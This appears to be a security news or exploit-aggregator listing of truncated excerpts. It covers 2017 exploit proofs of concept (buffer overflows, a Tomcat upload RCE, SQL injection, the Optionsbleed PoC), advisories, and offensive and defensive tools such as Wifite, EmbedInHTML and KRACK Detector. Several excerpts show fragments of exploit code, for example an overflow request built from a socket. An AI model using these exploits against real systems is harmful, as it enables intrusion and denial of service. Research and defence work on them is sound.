Open-Xchange: SSRF - RSS feed, blacklist bypass (IP Formatting)

FYI - Tested on local installation of App Suite 7.8.4 REV 17 Hello, There appears to be a SSRF vulnerability in the below endpoint. This is due to a failure in the App Suite code when evaluating an IP address against a blacklist. The SSRF is limited to scanning hosts on port 80/443 but accuracy i...

SocuSoft Co. Photo 2 Video Converter 8.0.0 Code Execution / DoS

================================================================================= | | | | | | | | | | | |/' | / / / / | ' | /| | ' \ \ / | '| \ \ \ /\ / / | | | \ |/ / | | | | |./ / | | ./ /\ V V / || ||/|| || ||/ || / // C O N T A C T : Twitter: @ret2eax Email: [email protected] Blog:...

EmbedInHTML - Embed and hide any file in an HTML file

What this tool does is taking a file any type of file, encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, save...

Vonage VDV-23 - Denial of Service Exploit

Exploit for hardware platform in category dos / poc Overview During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will...

Dup Scout Enterprise 10.0.18 - Login Buffer Overflow Exploit

Exploit for windows platform in category remote exploits Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser...

Linux Process Hunter: Prochunter

Prochunter aims to find hidden process with all userspace and most of the kernelspace rootkits. This tool is composed of a kernel module that prints out all running processes walking the taskstruct list and creates /sys/kernel/prochunter/set entry. A python script that invokes the kernel function...

KRACK Detector - Detect and prevent KRACK attacks in your network

KRACK Detector is a Python script to detect possible KRACK attacks against client devices on your network. The script is meant to be run on the Access Point rather than the client devices. It listens on the Wi-Fi interface and waits for duplicate message 3 of the 4-way handshake. It then...

Easy MPEG/AVI/DIVX/WMV/RM To DVD Buffer Overflow

!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...

Apache James Deserialization RCE(CVE-2017-12628)

Analysis of CVE-2017-12628 This morning I spotted a tweet mentioning an “Apache James 3.0.1 JMX Server Deserialization” vulnerability, CVE-2017-12628, which caught my eye because I wrote a generic JMX deserialization exploit which is included in my RMI attack tool BaRMIe. A quick search for more...

Check_MK 1.2.8p25 - Information Disclosure

CheckMK 1.2.8p25 - Information Disclosure 1. ADVISORY INFORMATION ======================= Product: Checkmk Vendor URL: https://mathias-kettner.de/checkmk.html Type: Race Condition CWE-362 Date found: 2017-09-21 Date published: 2017-10-18 CVSSv3 Score: 7.5...

Opentext Documentum Content Server File Hijack / Privilege Escalation

!/usr/bin/env python Opentext Documentum Content Server formerly known as EMC Documentum Content Server does not properly validate input of PUTFILE RPC-command which allows any authenticated user to hijack arbitrary file from Content Server filesystem, because some files on Content Server...

Apache Tomcat Upload Bypass / Remote Code Execution

!/usr/bin/python import requests import re import signal from optparse import OptionParser class bcolors: HEADER = '\03395m' OKBLUE = '\03394m' OKGREEN = '\03392m' WARNING = '\03393m' FAIL = '\03391m' ENDC = '\0330m' BOLD = '\0331m' UNDERLINE = '\0334m' banner=""" / \ \ / / | | \ / / | | / | \ /...

Wifite 2 - A complete re-write of Wifite (Automated Wireless Attack Tool)

A complete re-write of wifite, a Python script for auditing wireless networks. What's new? Lots of files instead of "one big script". Cleaner process management -- No longer leaves processes running in the background. UX: Target access points are refreshed every second instead of every 5 seconds...

Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Local Buffer Overflow (SEH)

!/usr/bin/python Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow SEH Date: 05-10-2017 Exploit Author: Venkat Rajgor Vendor Homepage: http://www.divxtodvd.net/ Software Link: http://www.divxtodvd.net/easyvideotodvd.exe Tested On: Windows 7 x64 To reproduce...

UEFI Firmware Parser

The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials. Installation This module is includ...

Dnsmasq < 2.78 - Information Leak Exploit

Exploit for multiple platform in category dos / poc ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup...

FileRun 2017.09.18 SQL Injection

!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...

Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)

!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...

Apache &lt; 2.2.34 / &lt; 2.4.27 - OPTIONS Memory Leak

!/usr/bin/env python3 Optionsbleed proof of concept test by Hanno Böck import argparse import urllib3 import re def testbleedurl, args: r = pool.request'OPTIONS', url try: allow = strr.headers"Allow" except KeyError: return False if allow in dup: return dup.appendallow if allow == "": print"empty...

Astaro Security Gateway 7 - Remote Code Execution

Astaro Security Gateway 7 - Remote Code Execution !/usr/bin/python Astaro Security Gateway v7 - Unauthenticated Remote Code Execution Exploit Authors: Jakub Palaczynski and Maciej Grabiec Tested on versions: 7.500 and 7.506 Date: 13.12.2016 Vendor Homepage: https://www.sophos.com/ CVE:...